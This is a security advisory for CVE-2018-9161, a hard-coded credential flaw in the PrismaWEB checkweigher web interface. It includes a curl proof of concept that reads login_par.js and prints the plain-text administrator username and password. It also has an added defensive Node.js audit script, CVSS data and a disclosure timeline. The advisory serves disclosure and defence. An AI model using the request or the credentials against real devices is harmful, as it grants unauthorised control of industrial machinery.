Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass
Vendor: Prisma Industriale S.r.l.
Product web page: https://www.prismaindustriale.com
Affected version: 1.0 (Rev 21, EPROM 202FWSAM ??)
Summary: Web Administration of Machine.
Desc: The vulnerability exists due to the disclosure of hard-coded credentials, which
allows an attacker to effectively bypass authentication of PrismaWEB with administrator
privileges. The credentials can be disclosed by simply navigating to the login_par.js
JavaScript file, which holds the username and password for the management interface.
These are used by the Login() function in the /scripts/functions_cookie.js script.
Tested on: HMS AnyBus-S WebServer
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5453
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php
06.02.2018
---
$ curl http://10.10.10.70/user/scripts/login_par.js
// JavaScript Document
// 11 Dicembre 2009 Release 1.0 Rev.10
var txtChkUser = "prismaweb"; // Nome utente Login
var txtChkPassword = "prisma"; // Password Login
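
Added example, not part of the original advisory or of the vendor's code: a small Node.js audit that flags string literals assigned to, or compared against, credential-like identifiers in JavaScript files a device's web server hands to clients (CWE-798). The first sample reproduces the login_par.js content shown above; the second file, the function names and the identifier pattern are constructed for illustration.

```javascript
// Identifier fragments that suggest a credential (assumption; tune per code base).
const CRED_NAME = /(user|login|pass|pwd|secret|token)/i;
// identifier, then = / == / === / :, then a quoted literal (escaped quotes allowed).
const ASSIGN = /([A-Za-z_$][\w$]*)\s*(?:={1,3}|:)\s*(["'])((?:\\.|(?!\2)[^\\])*)\2/g;

// Scan one file. Comments are scanned on purpose: a commented-out password in a
// client-served script is disclosed just the same. Findings carry the literal's
// length, never its value, so the report does not become a second copy of the secret.
function auditSource(file, source) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, idx) => {
    for (const m of text.matchAll(ASSIGN)) {
      const name = m[1];
      const value = m[3];
      if (!CRED_NAME.test(name) || value.length === 0) continue; // skip empty placeholders
      findings.push({ file, line: idx + 1, name, length: value.length });
    }
  });
  return findings;
}

// Scan a map of { path: source } covering everything under the served web root.
function auditTree(files) {
  return Object.entries(files).flatMap(([file, src]) => auditSource(file, src));
}

// Sample 1: file content as shown in the advisory.
const SAMPLE_LOGIN_PAR = [
  "// JavaScript Document",
  "// 11 Dicembre 2009 Release 1.0 Rev.10",
  "",
  "var txtChkUser\t\t\t\t= \"prismaweb\";\t// Nome utente Login",
  "var txtChkPassword \t\t\t= \"prisma\";\t\t// Password Login",
].join("\r\n");

// Sample 2: constructed file with a benign literal, an empty placeholder,
// and a commented-out comparison containing an escaped quote.
const SAMPLE_UI = [
  "var txtTitle = 'Checkweigher';",
  "var txtChkPassword = '';",
  "// if (pwd == 'old\\'pw') ok();",
].join("\n");

const SAMPLE_FILES = {
  "user/scripts/login_par.js": SAMPLE_LOGIN_PAR,
  "user/scripts/ui.js": SAMPLE_UI, // hypothetical path
};

for (const f of auditTree(SAMPLE_FILES)) {
  console.log(`${f.file}:${f.line} ${f.name} (literal of ${f.length} chars)`);
}
```

Any finding in a file reachable without authentication means the check it supports runs in the browser and the secret has to be treated as public; the fix is server-side verification, not renaming or obfuscating the variable.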
---
CVE: CVE-2018-9161
CWE: CWE-798
NVD description: Prisma Industriale Checkweigher PrismaWEB 1.21 allows remote attackers to discover the hardcoded prisma password for the prismaweb account by reading user/scripts/login_par.js.
CVSS v3.0 (NVD): 9.8 CRITICAL (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS v2.0 (NVD): 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CPE: cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:*
NVD entry: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9161 (published 2018-03-31, modified 2018-05-11)
Exploit-DB: EDB-ID:44276, https://www.exploit-db.com/exploits/44276/ (published 2018-03-12)
Type: Local/Remote
Impact: DoS, Security Bypass, System Access
Risk: (5/5)
Release Date: 10.03.2018
Vendor Status:
[06.02.2018] Vulnerability discovered.
[19.02.2018] Vendor contacted.
[09.03.2018] No response from the vendor.
[10.03.2018] Public security advisory released.
PoC: prismaweb_auth.txt
Credits: Vulnerability discovered by Gjoko Krstic - gjoko@zeroscience.mk
References:
[1] https://exchange.xforce.ibmcloud.com/vulnerabilities/140264
[2] https://packetstormsecurity.com/files/146726
[3] https://cxsecurity.com/issue/WLB-2018030101
[4] https://www.exploit-db.com/exploits/44276/
[5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9161
[6] https://nvd.nist.gov/vuln/detail/CVE-2018-9161
Changelog:
[10.03.2018] - Initial release
[16.03.2018] - Added reference [1], [2], [3] and [4]
[19.04.2018] - Added reference [5] and [6]
Contact: Zero Science Lab
Web: http://www.zeroscience.mk
e-mail: lab@zeroscience.mk